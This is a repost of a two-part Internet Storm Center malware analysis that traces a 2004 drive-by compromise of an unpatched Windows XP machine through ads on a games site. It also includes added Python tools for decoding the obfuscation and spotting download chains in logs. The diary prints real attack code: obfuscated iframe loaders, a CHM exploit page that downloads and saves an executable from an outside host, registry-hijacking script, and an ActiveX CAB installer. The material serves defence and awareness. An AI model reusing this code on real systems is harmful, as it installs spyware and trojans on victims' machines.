


One of the most successful series of the Internet Storm Center


At least read the first 3 paragraphs (then you will know why you need to read the whole thing)

Tom Liston's Following the Bouncing Malware - Part I:


On July 20th, after investigating some adware/spyware/malware that had been loaded onto a machine without the user's knowledge, I decided to try an experiment. I wondered just exactly how easy it really was to get an unpatched machine compromised, and what it would look like to "Joe Average" computer user. I set up a VMware image of a fresh install of Windows XP Home Edition, and headed out on the internet to see just exactly what happened. My trip was an enlightening journey into the dangers lurking out on the 'net for the unwary, and along the way I've learned some interesting things about the spyware/adware industry.

Today's diary entry represents the first part of my analysis of what happened when I "forgot to use protection" on the Internet. In part II, I'll examine the full extent of the damage that my poor "Joe Average" would have received, and perhaps add a little "editorializing" to my findings.

To give you a little "preview", I'll say this: I discovered that as far as the adware/spyware industry is concerned, you may be the one that plunked down a grand at your local consumer electronics store to purchase your PC, but THEY own it. They'll do whatever they want, whenever they want, and you don't get a say in the matter. The utter "ballsy-ness" of what they do will astonish you, and I hope reading this might make some of the people enabling this sort of activity to wake up and take action.


Obviously, what happened in my little experiment would be a result of where I decided to go on the net. To be perfectly fair, the sites that will be mentioned in this essay are only a cross-section of the evil that is waiting out there on the net - they're probably no better, or worse than any of the other adware/spyware ilk. My choice of a "starting point" was based on the incident that I had just investigated.

In deciding to be "Joe Average", I tried to replicate (as well as possible) the machine that I had just investigated. That machine had IE6.0 with the Google Toolbar installed with the popup blocker active. Please keep this setup in mind as I "follow the bouncing malware."

Also, something to keep in mind: I'm not going to set up any of the URLs in this tale so that they act as hyperlinks. This is done on purpose. DO NOT FOLLOW THE PATH I'M DESCRIBING HERE, ESPECIALLY IF YOU ARE RUNNING AN UNPATCHED MACHINE. THIS MEANS YOU. REALLY.

After installing the Google Toolbar, I did exactly what my "Joe Average" had done to get his machine compromised: Googled. Someone had told him about "Yahoo Games", and well, he wanted to check it out. I put "Yahoo games" into Google and then clicked on "www.yahoogamez.com" (NOTE: If you're running an unpatched machine, DO NOT GO THERE).

yahoogamez.com is a website that contains links to many different online games, and while I have no idea if their games are any good, their advertisements are certainly interesting. Like many websites which offer online games, the idea here is to get people to visit the site and generate revenue based on advertising that appears on the site and provides an income based on both the number of times an ad is displayed ("impressions") and, especially, on any "click through" traffic. Generally, the site owner contracts with another company that acts as a "go-between", selling "placement" to advertisers, and contracting with sites to display ads. Many of these online advertising companies then provide servers that, on a rotating basis, dole out the code and images for ads to participating websites.

In two instances on the yahoogamez.com site, there are ads provided by "aim4media.com". Going to the yahoogamez website results in a flurry of HTTP activity, including the following:

[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"

Which results in the following HTML:

-----------------------------------------------------------------------------------------------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent'>
<iframe src="http://205.236.189.58/mynet/mynet-MML.html" width=468 height=60 hspace=0 vspace=0
frameborder=0 marginheight=0 marginwidth=0 scrolling=no> <a href="http://205.236.189.58/mynet/mynet-MML.html"
target="_blank"><img width=468 height=60 src="http://205.236.189.58/mynet/mynet-MML.html" border=0></a></iframe>
<div id="beacon_459" style="position: absolute; left: 0px; top: 0px; visibility: hidden;">
<img src='http://adserver.aim4media.com/adlog.php?bannerid=459&amp;clientid=431&amp;zoneid=450&amp;source=&amp;
block=86400&amp;capping=3&amp;cb=7da741942b0623acd85070683ffa3ad8' width='0' height='0' alt='' style='width: 0px;
height: 0px;'></div>
</body>
</html>

-----------------------------------------------------------------------------------------------------------

This results in the following HTTP GET:
[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
And the following HTML gets downloaded:
<a href="http://www.lovemynet.com/?frombanner2" target="_blank">
<img src="http://209.50.251.182/lovemynet/banner1.gif" width=468 height=60 border=0>
</a>
<!-- HP2 -->
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

-----------------------------------------------------------------------------------------------------------

Looks like someone is trying to hide something... This decodes to:
<iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"

Which gives us:
-----------------------------------------------------------------------------------------------------------
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>

-----------------------------------------------------------------------------------------------------------

Which decodes to:
<textarea id="code" style="display:none;">
    <object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm" type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
    document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('hp2.htm'))));
</script>

-----------------------------------------------------------------------------------------------------------
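To do this decoding mechanically, and to see how the `${PATH}` substitution produces the double slash in the `/hp2//HP2.CHM` request that follows, here is an added Python example (not part of Tom Liston's diary or this site). The two samples are the obfuscated blocks quoted above copied verbatim; `expand_path_macro` emulates the decoded script's `replace()` call for an assumed `location.href` of the hp2.htm URL.

```python
import html
import re

# Sample 1: the mynet-MML.html script block quoted in the diary above.
MYNET_SCRIPT = r"""<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>"""

# Sample 2: the hp2.htm script block quoted in the diary above.
HP2_SCRIPT = r"""<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>"""

ESCAPE_RE = re.compile(r"\\u([0-9a-fA-F]{4})")
WRITE_RE = re.compile(r"document\.write\(\s*'(.*?)'\s*\)", re.DOTALL)


def decode_escapes(text):
    """Replace \\uXXXX escapes with their characters. The raw newlines inside
    the literal are line wraps from the diary's rendering, so drop them."""
    text = text.replace("\r", "").replace("\n", "")
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def decode_document_writes(page):
    """Decode the string literal handed to every document.write('...') in page."""
    return [decode_escapes(m.group(1)) for m in WRITE_RE.finditer(page)]


def expand_path_macro(decoded, location_href, marker):
    """Emulate code.value.replace(/\\${PATH}/g, location.href.substring(0,
    location.href.indexOf(marker))) from the decoded stage; JS substring(0,-1)
    yields '', which is what happens when the marker is absent."""
    idx = location_href.find(marker)
    prefix = location_href[:idx] if idx >= 0 else ""
    return html.unescape(decoded.replace("${PATH}", prefix))


def find_indicators(decoded):
    """What an analyst looks for in the decoded output: a 1x1 iframe, an
    ms-its:/mhtml: object (the CHM exploit) and a text/x-scriptlet object.
    Entities are unescaped first because the page hides the 'm' as &#109;."""
    found = []
    for tag in re.findall(r"<iframe[^>]*>", decoded, re.I):
        if re.search(r"width=['\"]?1\b", tag) and re.search(r"height=['\"]?1\b", tag):
            found.append("hidden 1x1 iframe")
    text = html.unescape(decoded).lower()
    if "ms-its:" in text:
        found.append("ms-its: CHM protocol handler")
    if "mhtml:" in text:
        found.append("mhtml: redirect")
    if "text/x-scriptlet" in text:
        found.append("scriptlet object")
    return found


if __name__ == "__main__":
    for sample in (MYNET_SCRIPT, HP2_SCRIPT):
        for decoded in decode_document_writes(sample):
            print(decoded, "\nindicators:", find_indicators(decoded), "\n")
    stage2 = decode_document_writes(HP2_SCRIPT)[0]
    # With hp2.htm loaded from the iframe URL, the object data becomes the
    # ms-its: URL whose double slash shows up in the diary's /hp2//HP2.CHM log line.
    print(expand_path_macro(stage2, "http://69.50.139.61/hp2/hp2.htm", "hp2.htm"))
```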

[20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"

Within this chm exploit, we find the following hp2.htm file:

-----------------------------------------------------------------------------------------------------------
<script language="vbscript">
Function Exists(filename)
On Error Resume Next
LoadPicture(filename)
Exists = Err.Number = 481
End Function
</script>
<script language="javascript">
var oPopup = window.createPopup();
function showPopup()
{
oPopup.document.body.innerHTML =
"<object data=http://209.50.251.182/vu083003/object-c002.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
wmplayerpaths= [
"C:\\Programmer\\Windows Media Player\\wmplayer.exe",
"C:\\Program\\Windows Media Player\\wmplayer.exe",
"C:\\Programme\\Windows Media Player\\wmplayer.exe",
"C:\\Programmi\\Windows Media Player\\wmplayer.exe",
"C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
"C:\\Programas\\Windows Media Player\\wmplayer.exe",
"C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
"C:\\Program Files\\Windows Media Player\\wmplayer.exe"
];
for (i=0;i<wmplayerpaths.length;i++) {
wmplayerpath = wmplayerpaths[i];
if (Exists(wmplayerpath))
break;
}
function getPath(url) {
start = url.indexOf('http:')
end = url.indexOf('HP2.CHM')
return url.substring(start, end);
}
payloadURL = getPath(location.href)+'hp2.exe';
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(wmplayerpath,2);
var win=null;
function NewWindow(mypage,myname,w,h,scroll,pos){
if(pos=="random"){
LeftPosition=(screen.width)?Math.floor(Math.random()*(screen.width-w)):100;
TopPosition=(screen.height)?Math.floor(Math.random()*((screen.height-h)-75)):100;
}
if(pos=="center"){
LeftPosition=(screen.width)?(screen.width-w)/2:100;
TopPosition=(screen.height)?(screen.height-h)/2:100;
}
else if((pos!="center" && pos!="random") || pos==null){
LeftPosition=0;TopPosition=20
}
settings='width='+w+',height='+h+',top='
+TopPosition+',left='+LeftPosition
+',scrollbars='+scroll
+',location=no,directories=no,status=no,menubar=no,toolbar=no,resizable=no';
win=window.open(mypage,myname,settings);
}
location.href = "mms://";
</script>


-----------------------------------------------------------------------------------------------------------

Following along...
[20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hkcu");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hklm");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hkcu");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hklm");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
</script>
<script language=javascript>
self.close()
</script>
</html>


-----------------------------------------------------------------------------------------------------------

Well, our home page just got changed, as did our default search engine... Nice, real nice. But that's not all... there was a file called "hp2.exe" that was downloaded and executed by our .chm exploit. Sure enough, looking at my logs, I found:

[20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"
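As an added example (not from the diary or this site), the following Python run over the GET lines quoted so far reconstructs the htm -> CHM -> exe sequence from one host and the .js -> .cab pair from addictivetechnologies.net. The sample log is those lines copied verbatim in the order the diary quotes them; the 60-second window and the "same site" rule that ignores a leading www. are assumptions.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address

# Constructed sample: the GET lines quoted in the diary, copied verbatim.
SAMPLE_LOG = """\
[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"
[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"
[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"
[20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"
[20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"
[20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"
[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"
[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"
"""

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] "GET_(?P<base>[^"]+)" - - "(?P<path>\S+) HTTP/[\d.]+"$')


def parse_log(text):
    """Return (time, host, path) tuples for every request line, oldest first."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in this format
        when = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        host = re.sub(r"^https?://", "", m.group("base")).lower()
        entries.append((when, host, m.group("path")))
    return sorted(entries)


def site_of(host):
    """Treat www.example.net and example.net as the same site (assumption)."""
    return host[4:] if host.startswith("www.") else host


def ext_of(path):
    """Lower-cased extension of the path, ignoring any query string."""
    return path.split("?", 1)[0].rsplit(".", 1)[-1].lower()


def ip_literal_hosts(entries):
    """Hosts addressed by bare IP, as the iframe and CHM servers above are."""
    found = set()
    for _, host, _ in entries:
        try:
            ip_address(host)
            found.add(host)
        except ValueError:
            pass
    return sorted(found)


def find_chains(entries, stages, window=timedelta(seconds=60)):
    """Find fetches from one site whose extensions match `stages` in order,
    each hop within `window` of the previous one. A greedy scan is enough
    here; it generalises the htm -> chm -> exe sequence the diary shows."""
    chains = []
    for i, first in enumerate(entries):
        if ext_of(first[2]) not in stages[0]:
            continue
        chain, prev, pos = [first], first, i + 1
        for wanted in stages[1:]:
            hit = None
            for j in range(pos, len(entries)):
                t, h, p = entries[j]
                if t - prev[0] > window:
                    break  # entries are time-sorted, nothing later can match
                if site_of(h) == site_of(prev[1]) and ext_of(p) in wanted:
                    hit = j
                    break
            if hit is None:
                break
            prev, pos = entries[hit], hit + 1
            chain.append(prev)
        else:
            chains.append(["http://" + h + p for _, h, p in chain])
    return chains


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    print("bare-IP hosts:", ip_literal_hosts(log))
    print("CHM drive-by chains:", find_chains(log, [{"htm", "html"}, {"chm"}, {"exe"}]))
    print("script-then-CAB installs:", find_chains(log, [{"js"}, {"cab"}]))
```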

hp2.exe is what is known as a "dropper" program. That is, it is actually a small "stub" program with another (sometimes more than one) program attached to it as "data". When the program executes, it writes out the "data" to a file and then executes the resulting program. hp2.exe drops a UPX packed executable that, when executed, will contact www.totalvelocity.com/Bundling/tvmupdater4bp5.exe, which installs/updates the "TV Media Display" spyware.

At this point, I followed one link on the site that required I have Flash installed. Since I didn't have Flash installed, I went "back". But because I now had cookies placed on my computer from my original visit to the site, one of yahoogamez's files, popup.js, does something differently:

Now, this code within popup.js is executed:

-----------------------------------------------------------------------------------------------------------
if ((document.cookie.indexOf("popuptraffic") != -1 ) && (document.cookie.indexOf("popupsponsor") == -1)){
var expdate = new Date((new Date()).getTime() + 1800000);
document.cookie="popupsponsor=general; expires=" + expdate.toGMTString() + "; path=/;";
document.write("<script language=\"JavaScript\"
src=\"http://addictivetechnologies.net/dm0/js/Confirmfr03tp.js\"></script>");
}

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
var exepath='http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab';
var retry_enabled = true;
var retry_cnt=1;
document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
function retry() {
if(retry_cnt>0) {
alert("To install latest AT- Games update, please click Yes");
start_download();
retry_cnt--;
} else {
//alert("This is a 1 time install, once you click Open it will never pop up this message again");
//downloads_manager.window.location = "http://www.addictivetechnologies.net/DM0/exe/fr03tp.exe";
}
}
function start_download()
{
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
if ( navigator.platform && navigator.platform != 'Win32' ){
//alert("Sorry, your browser is not WIN32 Compatible");
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2){
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab"
HEIGHT=0 WIDTH=0></object>\n';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
}
else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
//trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}
start_download();

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"

This cab file contains two files:

ATPartners.inf - 403 bytes
ATPartners.dll - 96,256 bytes

The .dll file is identified by AV software as the Win32/TrojanDownloader.Rameh.C trojan.

And that's where I'm going to end it for today. In the next part, I'll take a look at what happens as this chain of malware continues on its merry way, and I'll also investigate what happens when I fire up IE the next time and visit my new home page.

-------------------------------------------------------------

 
Tom Liston's Following the Bouncing Malware - Part II

Note: The links in this part of the diary are purposely not clickable. DO NOT GO TO THESE SITES. THIS MEANS YOU. REALLY.
Welcome back to Part II of our journey through the seamier side of the internet. To those of you who wrote in asking, I’m sorry it took so long to get this put together and up...
In case you missed Part I, or in case you simply want to review, here's a link to where we started:
http://isc.sans.org/diary.php?date=2004-07-23
Go on... I’ll wait.
Ready? Good.
When we last left our intrepid "Joe Average" computer user, he had just installed Windows XP Home Edition, and gone out on the Internet in search of some fun and adventure. If you recall, someone had told him about Yahoo! Games and he wanted to try them out. Using Google, and ignoring (for whatever reason) several obvious links to Yahoo!, he scrolled down near the bottom of the first Google search page and clicked on a link leading to www.yahoogamez.com.
That's when the fun began.
With an IFRAME here and a CHM exploit there, Joe Average’s shiny new computer was transformed into something new... something Joe never dreamed it would become: an S.E.P.
"Somebody Else’s PC."
Huh?
Well, although Joe still owns (letter "o") the hardware, and gets the privilege of supplying it with electricity and an internet connection, someone else now 0wns (zero) his computer, and they’re making all of Joe's bright and shiny hardware dance to a tune that THEY’RE playing.
You see: All Joe wants his hardware to do is stop all of this nonsense and leave him in peace to play a rousing round of "Donut Boy 2" from the yahoogamez site. But the new happy-go-lucky pals that he's picked up while browsing have some other things in mind...
When I paused our adventure at the end of Part I, the list of "stuff" done to Joe's computer looked like this:
1) Joe's homepage had been changed. It is now set to:
http://default-homepage-network.com/start.cgi?new-hkcu
2) The default search page has been set to:
http://server224.smartbotpro.net/7search/?new-hkcu
3) Search assist has been turned off.
4) "TV Media Display" has been installed on Joe's machine (more on this later.)
5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.
So... what do Joe Average's new found buddies have planned for him next? Let's find out together as we continue to follow the bouncing malware.
Let's start by taking a look inside the file that Addictive Technologies "gave" to Joe. If you’ll recall, it was a .cab file called "fr03tp.cab," containing two files:
ATPartners.inf – 403 bytes
ATPartners.dll – 96,256 bytes
(Some editorializing: The ATPartners.dll contains a statically linked copy of the MSVC runtime. This is completely unnecessary. Addictive Technologies: If you're going to write malware, at least write EFFICIENT malware.)
Looking at the strings contained within the .dll file, we find some interesting stuff:
/F1/Cmd4F1_fr03t.txt
www.f1organizer.com
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
And some downright bizarre stuff:
Hara Hara Mahadev !!!
tum agar badshah hai to hum eespeek ka yekka!
(Would anyone care to enlighten me?)
Putting some obvious "stuff" from that list together, we get ourselves a URL:
http://www.f1organizer.com/F1/Cmd4F1_fr03t.txt
where we find the following interesting message:
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[AddF1]
Folder=AT-Games
Link=http://www.gamehouse.com/affiliates/template.jsp?AID=2226
Name=Gamehouse Games

[AddF2]
Folder=AT-Games
Link=http://www.regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7551
Name=Big Fish Games

[AddF3]
Folder=AT-Games
Link=http://www.regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7834
Name=FlyorDie Games

[AddF4]
Folder=..\\Desktop\\
Link=http://www.007arcadegames.com
Name=007arcadegames.com
IconFile=http://www.007arcadegames.com/007.ico
IconIndex=0

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/ezbdlLs.dll
InstallName1=bdlds.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server2=www.AddictiveTechnologies.net
Object2=/LoadShare/SplWbr.dll
InstallName2=SplWbr.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4SB2.htm
(Is it just me, or did anyone else find the term "softsell" in the above "RegNow" URLs more than a bit amusing?)
Hey look! More stuff was "updated" on Joe's computer: Let's see... They're adding some stuff to Joe's Internet "Favorites" to advertise purchase links for games that AT gets affiliate bucks for (Gamehouse Games, Big Fish Games, and FlyorDie Games), they've added a link on Joe's Desktop to "007arcadegames," and they're downloading more gifts for Joe: ezbdlLs.dll and SplWbr.dll.
SplWbr.dll weighs in at a whopping 454,656 bytes and is what is known in the AntiVirus biz as a "file dropper." That is, when it is executed, it writes out and installs or executes one or more files that are attached to it as data. In this case, it drops out two files:
Drop#1 – 135,088 bytes which claims to be "Ad Destroyer and Virtual Bouncer Installation" and is digitally signed by Spyware Labs, Inc. (www.spywarelabs.com).
Drop#2 – 302,544 bytes which silently installs "TopRebates.com AutoTrack software" (www.toprebates.com).
ezbdlLs.dll is a 151,040 byte UPX compressed .dll that expands to 176,128 bytes when uncompressed. It too is a file dropper, gracing Joe's machine with three new gifts:
Drop#1 – 65,536 bytes of ASPacked goodness from www.abetterinternet.com which claims to be a "[u]tility for downloading files and upgrading software. Visit www.abetterinternet.com for more info."
Drop#2 – 33,280 bytes of UPX packed fun which expands into 65,536 bytes of crappy software engineering from the fine folks at ezULA (www.ezula.com) whose stated goal is "Making Your Internet Browsing Simple, Exciting, and Personal." Uh... no thank you.
Drop#3 – 65,024 bytes filled with a NullSoft Installer that gifts Joe's machine with SAHAgent, a Winsock2 Layered Service Provider (LSP) that installs itself in Joe's WinSock stack, much like a personal firewall. SAHAgent redirects select web traffic to cause online purchases made by Joe to be done in a way that will route any affiliate bucks to a specific affiliate ID.
